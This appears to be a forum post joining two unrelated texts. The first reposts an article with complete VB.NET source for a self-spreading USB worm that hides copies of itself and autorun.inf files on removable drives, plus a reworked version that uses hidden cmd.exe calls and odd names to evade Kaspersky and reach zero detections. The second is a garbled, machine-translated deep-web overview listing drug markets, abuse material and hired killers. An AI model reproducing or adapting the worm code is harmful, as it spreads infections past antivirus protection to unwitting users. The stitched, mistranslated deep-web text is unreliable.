Leaderboard

Some Basics and Overview Usually when we talk about bypassing antivirus software, and especially when we talk about antivirus programs like NOD32, Kaspersky, BitDefender… We automatically think about deep coding knowledge, using undocumented APIs or using Zero days exploits, but this is not always true, since by applying some “very” basics approaches we will be able to bypass most of (if not all) antivirus programs, at least for doing some basic things. Basically, all antivirus programs detect malicious files the same way, either by checking for a digital signature inside of the files (which explains the importance of keeping your antivirus up to date) or by a technique called heuristic detection. This (and of course other criteria) usually makes the difference between a good and a bad antivirus. Signature detection Technically when an antivirus starts looking for a signature, it looks for “string(s)” found by Antivirus research labs and considered as a fingerprint that a malicious program code may have. Every single virus, worm, or any other malware has its own signature, and considering the fact that there are billions of malicious files in the world, and there are more and more malware developers, looking for a specific signature becomes almost impossible, so Antivirus labs and malware analysts start to give a kind of generic signature to help find a type of malicious program, and not the “one by one” way. Even using generic signatures, this detection mode is still archaic due to the diversity of ways to protect malware from being detected. Complex packers, custom encryption or polymorphism make this way of detection not 100% reliable, especially when it comes to detecting totally new viruses or very complex ones. Heuristic detection Almost all recent antivirus software have a heuristic detection mode which consists (in a very simple way) to simulate a file execution, then monitoring if this file performs any suspicious activities like replication, file injection, file downloading or hiding files from the explorer. This is quite clever, but may lead to generate lot of false positive detections since heuristic analysis is a kind of multi-criteria analysis based in most cases on “already known” codes, classes, methods, functions or some commands that are not usually implemented in widely used programs. This may be considered as a kind of weakness that would, and will be, exploited (later in this article) to avoid detection by this way of analysis, since at this stage, bypassing heuristic analysis is bypassing the whole antivirus because every “fully” new coded malware is totally unknown by the antivirus and will not be detectable instantly via a digital signature. The problem is not coding a harmful program; the real problem is spreading it out! As known, the aim of any malicious program coder is to infect or take the control of the largest number possible of computers, and this cannot be done manually, so almost every virus, worm, botnet, etc. has one or more ways to propagate implemented as functionality! And one of the most common modes used is self-spreading via removable disks like USB flash drives. The idea is quite simple: the malware will check periodically for removable disks (USB keys, memory cards, and even some external hard drives). If found, it will copy itself (replication of the original malware) on it / them under an appealing name or under a random one, but hides itself from the explorer by changing the file attributes, and will create an Autorun.inf file which will run the replication mode every time this removable disk is plugged into a computer. Our Main Goal For every new generation of Antivirus software, this behavior will be flagged as suspicious or malicious behavior and will be detected in most of cases as Trojan horse Dropper.Generic, Trojan.Generic or something similar! We will see how we can make a fully undetectable USB spreader, without any obfuscation or encryption, just by making the same thing the way Kaspersky’s heuristic analysis does not consider as “malicious behavior”. I’ll use VirusTotal to analyze generated files (even if it’s not important since our program is not really harmful) and all upcoming tests are made under Windows 7 Ultimate with the trial version of Kaspersky Internet Security 11.0.2.556 installed. All codes are in VB.NET using Frameworks 4, which is an uncommon language for coding malicious stuff, but it’s wise to say that some serious worms, viruses and remote administration tools were done using VB, VB.net or VBscript. Anyway, let’s make a USB dropper “the normal way” and see how it’s seen by VirusTotal and Kaspersky’s heuristic analysis. The Game Let’s start by making a basic USB spreader. If you want to make tests, just create a new project under Microsoft Visual Studio, and make sure you import System.Threading and System.IO then copy and paste this code: Imports System.Threading Imports System.IO Public Class Form1 Shared ReplicatedName As String = “USBsetup.exe” Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load StartUSBspreading() End Sub Sub StartUSBspreading() Try Do Dim Alldrives() As DriveInfo = DriveInfo.GetDrives() For Each DriveFound As DriveInfo In Alldrives If DriveFound.DriveType = “2? And DriveFound.IsReady = True Then System.IO.File.Copy(Application.ExecutablePath, DriveFound.RootDirectory.ToString & ReplicatedName, True) File.SetAttributes(DriveFound.RootDirectory.ToString & ReplicatedName, FileAttributes.Hidden) AutorunMaker(DriveFound) End If Next DriveFound Thread.Sleep(6000) Loop Catch ex As Exception End Try End Sub Public Shared Sub AutorunMaker(ByVal driveFound As DriveInfo) Try File.Delete(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”) Dim AutorunStreamWriter As New StreamWriter(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”) AutorunStreamWriter.WriteLine(“[autorun]“) AutorunStreamWriter.WriteLine(“shellexecute=” & ReplicatedName) AutorunStreamWriter.Flush() AutorunStreamWriter.Close() File.SetAttributes(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”, FileAttributes.Hidden) Catch ex As Exception End Try End Sub End Class Instead of using direct APIs like WM_DEVICECHANGE that get you notified about hardware device changes, and to avoid the use of controls like timers, usually malicious programs coders use infinite loops looking for removable disks, and that sleep for seconds, just like what happens in this case. On program load, StartUSBspreading() is called and it gets all detected drives, then it looks only for removable ones. If the drive found is ready, the program makes a replication of itself and an aurotun.inf file that will load the replicated file, and hides both of the newly made files. VirusTotal did not return real useful information since it makes just a static analysis: File name: MyTestApp.exe Detection ratio: 1 / 42 Antivirus Result Update Jiangmin Trojan/Generic.niew 20120904 Kaspersky - 20120904 https://www.virustotal.com/file/497571ba2d8a51ae4a3f7ce3a9746fef3563bd18ed4cf126d4b1b34d4bcdcf9f/analysis/1346767444 With a detection ratio of 1/42 we may say that we have already an interesting achievement, but when running a heuristic analysis of Kaspersky it detects our program, which has no digital signature, as high risk program and neutralizes the threat. Figure 1 Behavior similar to PDM.Trojan.generic detected At this stage we can consider several changes on our code that may lead to decreased detection rate, like using classes and modules, but one of the most powerful – and easiest – techniques is renaming as many functions, subs and events used as possible. We said that heuristic analysis is based on already known stuff, and almost all malicious programs do the same things like damaging your computer, stealing personal data or spying on your activities … and most of these aims are reached using some common piece of codes, for example to make a keylogger, you will probably use APIs like SetWindowsHookEx and events like Hook_Keyboard(), and by changing subs and functions names to some common ones (like BooksManagers(), Baby, Chat_System(), etc.) malicious coders reach an unexpected detection ratio! Renaming already known functions and subs can actually decrease detection ratio very considerably. Our sample is just a few lines of code, and renaming subs will not bypass Kaspersky. Let’s think about this a second, our objective is clear: making a replication of our program and an Autorun.inf file in any plugged removable disk. Instead of using suspicious methods like File.Copy() and File.Delete(), we can possibly make Kaspersky and most antivirus programs believe that it’s the user who copied or deleted files by using another intermediary program that requires almost no privilege, which is Windows CMD command line (executable cmd.exe). By invoking the Windows command silently, we can do everything that could be done via the command line without any restrictions! We can make a thread that creates the autorun.inf file temporarily somewhere in the user’s system folder and another thread that checks for the presence of plugged removable disks and makes copy tasks via hidden instances of command line. This may seems strange, but after some tests I made, using weird names for functions, procedures, and methods may also help decrease the detection ratio. Here is the new code for our USB dropper: Imports System.Threading Imports System.IO Public Class Form1 Dim MyPogramPath As String = Application.ExecutablePath Dim MyAutPath As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & “\microsoft\autorun.inf” Dim mo As New Thread(AddressOf makdeotrn) Dim k1 As New Thread(AddressOf kaynaChiKle) Sub OnchorhaWalakal2ajr(ByVal d As String) Try If Not IO.File.Exists(d & “Flash_Update.exe”) Then Dim Proc As New Process() Proc.StartInfo.FileName = “cmd.exe” Proc.StartInfo.Arguments = “/c copy “ & “”"” & MyPogramPath & “”"” & ” “ & “”"” & d & “Flash_Update.exe” Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden Proc.StartInfo.CreateNoWindow = False Proc.Start() Proc.WaitForExit() Proc.Close() FileSystem.SetAttr(d & “Flash_Update.exe”, FileAttribute.Hidden) End If Catch ex As Exception End Try End Sub Sub OnchorhaWalakal2ajr2(ByVal d As String) Try Dim Proc As New Process() Proc.StartInfo.FileName = “cmd.exe” Proc.StartInfo.Arguments = “/c copy “ & “”"” & MyAutPath & “”"” & ” “ & d Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden Proc.StartInfo.CreateNoWindow = False Proc.Start() Proc.WaitForExit() Proc.Close() FileSystem.SetAttr(d & “autorun.inf”, FileAttribute.Hidden) Catch ex As Exception End Try End Sub Sub kaynaChiKle() a: Dim kle() As DriveInfo = DriveInfo.GetDrives() For Each found As DriveInfo In kle If found.DriveType = “2? And found.IsReady = True Then Try OnchorhaWalakal2ajr2(found.RootDirectory.ToString) OnchorhaWalakal2ajr(found.RootDirectory.ToString) Catch ex As Exception End Try End If Next found GoTo a End Sub Public Sub MakDeOtrn() Try Dim appdata As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & “\microsoft\” Dim sw As New StreamWriter(appdata & “autorun.inf”) Dim s As String = appdata & “autorun.inf” If IO.File.Exists(s) Then Try IO.File.Delete(s) Catch ex1 As Exception End Try End If sw.WriteLine(“[autorun]“) sw.WriteLine(“shellexecute=” + “Flash_Update.exe”) sw.Flush() sw.Close() Catch ex As Exception End Try End Sub Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load mo.IsBackground = True mo.Start() k1.IsBackground = True k1.Start() End Sub End Class Some explanation for the code above: MakDeOtrn() will make autorun.inf into “C:\Users\UserName\AppData\Roaming\microsoft” designed to run a file called “Flash_Update.exe“ OnchorhaWalakal2ajr ( checks if the removable disk is not infected yet, if it’s true, we set the application that we want to start which is cmd.exe, we set the arguments that are in the command line which will copy the running program (our malicious program) to the removable disk found, under the name “Flash_Update.exe” and of course starts cmd.exe in a hidden window, and wait until the end of copying process to hide the replicated file from the explorer. OnchorhaWalakal2ajr2 ( does the same thing as #2 for “autorun.inf“ kaynaChiKle() will check infinitely for the presence of removable disks, if found it calls respectively procedures #3 and #2. Before testing this new generated program, VirusTotal now considers it as a clean file with a detection ratio of 0/41 as you can see from this link. (www.virustotal.com/file/62254a2968b9a9385a9510431b8023fa2db50b572b6c5d76fdfea0234df8ea03/analysis/1346780514/) Scanning our program with Kaspersky reveals absolutely nothing: Figure 2 No threat has been detected After starting it, our program spreads itself as seen here: To Conclude… We can make fully undetectable Download and Execute programs, even some silent Download and Install programs and some real silent adwares, and this with absolutely no deep coding knowledge, and the worst is that this simple technique seems to bypass all known antivirus (tested with 5 well known antivirus and further tests are to come), and we can make our spreader even more difficult to detect by encrypting or obfuscating it. Complicated things like bypassing antivirus, especially those like Kaspersky, NOD32, BitDefender or AntiVir may not need to be done the complicated way, the example of this USB spreader may let us conclude that as smart as an antivirus and its analysis are, there is always a “simple” way to cheat it. Sursa: http://resources.infosecinstitute.com/antivirus-evasions-the-making-of-a-full-undetectable-usb-dropper-spreader/

This information is found on the internet, there are also several topics posted on the same. But I found this information quite good and explanatory and even brings a videotutorial. want to inform this forum that this information does not incite others to commit crimes, is pure information so that users are aware of the dangers that exist on the Internet. And that users to be aware of this are more careful where you surf. First of all, I am not responsible for the use that give this information to access this site, it is assumed that they are older, and have " certain "knowledge of the Internet, this post is for information only and no incentive for users to make contact with any of the illegal activities that can be found on the Web Deep The Deep Web - Dark Side of the Internet - WEB IS DEEP Known Internet Internet as deep or invisible (in English: Deepnet, Invisible Web, Hidden Web or Dark Web) to all Internet content that is not part of the Internet Superficial, ie the network pages indexed by search engines Internet. This is due to the limitations of the network to access all websites for various reasons. How is originated the Deep Web? The Deep Web (Deep Red), in (1994) called the Invisible Web, has been named to Thus in 2001 because it is not directly accessible through the use of surface primary means of navigation in these times. The reason for this is usually divided into three factors. The first is technical or inadvertent, and is due to a lack of upgrading to new standards in terms of indexing or by the dynamic nature of a website (content change constantly, renewed through visitor interaction, etc..) The second case is that of private and protected sites or those containing documents in formats that can not be indexed. In these two cases, the search engine will not find in the code that read their content associable robots which refer directly static or can not access the protected databases (libraries, dictionaries, etc.), Thus " will pass "at that site. The other case involved a deliberate decision, because the same developer can tell the search engine that your code does not check periodically for changes through a variable as Follow / No Follow on If Google. If you choose not Follow, robots ignore the site and it will remain hidden, invisible, in the depth to which few have access. Having defined the Surface Web and the Deep Web, the question arises what is in all this we do not see. What are we missing? To understand what is at the bottom, it's best to imagine that only in 2001 (where personal sites like blogs and the like had not exploited at all) the information to be found on the Deep Web was 500 times higher than in the surface, taking the first few Terabytes 91,000 against 197. Extrapolating the numbers in a more traditional (no current data about it, same for the Deep Web properties), growth was undoubtedly immense, while recognizing that in 10 years of tracking systems and evolved much about education and information gigas and gigas profound Network are now visible. Substantively, the Deep Web is made ??up of all kinds of information, which when all these multiple, categorization becomes mandatory. Thus, between what is not in the superficial, we file formats with no HTML or text type (primary failure of complete websites in Flash) and some multimedia documents that are not indexed. As mentioned earlier, the dynamic content will be plentiful as well as private or personal sites. Also access the web called contextual varies whom or from where the visit and do not forget the limited content through techniques, etc.. THE DARK SIDE OF THE WEB After reading the above you've probably been thinking that maybe it was missing most shocking of all that is left out of the search engines, and in this respect the illegal and forbidden taking a leading role in harnessing the intentions of the Deep Web. Thus, in the same you get to find places traded drugs, weapons and even criminal services. Also no place for the exchange of pedophilia and any other illegal activity you have to stay very attentive, as well as contribute passively to these horrific practices continue nurturing public, you will also be exposed to all kinds of cyber-threats. Undiscounted constant infiltration and investigation of security agencies in these sites. But not all bad, because alongside the more objectionable aspects that may have the Hacking in general (as will be seen in sites that offer services to destroy servers, hack accounts, create viruses in community, etc.), Also shared knowledge systems, security and much more that is undoubtedly very interesting and generates no consequences for the average user.. S IN THE DEEP WEB Well for starters there is everything from useful things to the most atrocious and ill imaginable and Guides phone lists, e-mail, and all kinds of directories; - "People Finders" ie lists professionals from all the disciplines - Laws, decrees, general legal information, but some can be found in static web; - Patents ; - Dictionaries, glossaries although many are available, and do not forget that Wikipedia has a bit of everything - selling products through e-commerce; - graphics and multimedia files that do not have the keyword metadata that clearly identified; - business sites; - Digital books and journals; - yellow or white pages (Yellow / White pages) - Libraries; - Bookstores. . The most dangerous thing you can find * Sale of drugs (eg , the Silk Road is a famous page deep within the site, which sells all kinds of drugs) • Pornography Pornography Cp * - This is highly dangerous and sick so if time stands CP NOT ENTER • The option to hire hitmen • Jackers (as I read, easily take your IP but this is under proxy, and also can take most of the personal data of anyone) Most of the transactions in the Deep Web are carried out by the Bitcoins. You can buy virtually anything with this coin. Anyway, questions whether remains anonymous. (1 Bitcoin -> $ 14). URLs are characterized the deep web by: be the set of non-text files called, ie media files, graphics, software, and documents in Portable Document. Having the. onion (unlike the sites of the "surface" ending in. com) Be content databases accessible via web: the information is structured in tables of data created and managed with programs such as Access, Oracle, SQL Server, MySql. This information can only be filed if it is required by a query, a query. To do this you must make a deposit, login to a special area of the site, sometimes free, sometimes paid. It has been estimated that the site content databases is 500 times larger than the static web. This database of companies, organizations, institutions, and can take the form of database management support, customer catalogs and even specialized bibliographic databases on particular themes: medical, business, space, and even virtual libraries of universities and research centers. It is said that this information is invisible, hidden or deep because search engines can not enter them to extract the data. ADVANTAGES AND DISADVANTAGES OF THE DEEP INTO WEB When you enter search information to the Deep Web are the advantages that make the podium, it has been shown that the range of options open to choice, quality rates increase considerably. Given the network conditions and taking into account that the search engines are not necessarily qualifiers quality information is more likely to find quality items in a database of 100,000 in 1000. As research on various topics, get better results, and most original, with a search in this part of the web. Moreover it is possible to identify the anonymity, privacy, and the opportunities it can give before coarctation situations of oppression and freedom of expression. Disadvantages could be staged by the difficulty of access to the invisible web by users most laymen, for the abundance of information and processes you need to do to access it could be overwhelming and uncomfortable (the amount of data currently in the Deep Web, outweigh all printed information in the world). We also have to tell you how dangerous is this part of the site that is not controlled by standards at the browsers themselves or by computer security organizations. THINGS YOU SHOULD AVOID First of all we have as initial Because CP can be harmful for you in many ways, in addition to affecting your mental and secondly because it is illegal and you condemn puden all over the world for it. Disable images (for Chrome enter advanced tools, privacy settings, disable images) by doubts, in the deep web and many pedophiles are really unpleasant images. Disconnect / put the other way (eg wall) the webcam. As I read, some hackers take control of webcams. Do not enter any BBS or forum that contains "CP" in its name, or enter anything related to porn. Knowing what we click. VISUAL VIDEO INFORMATION AND SUMMARY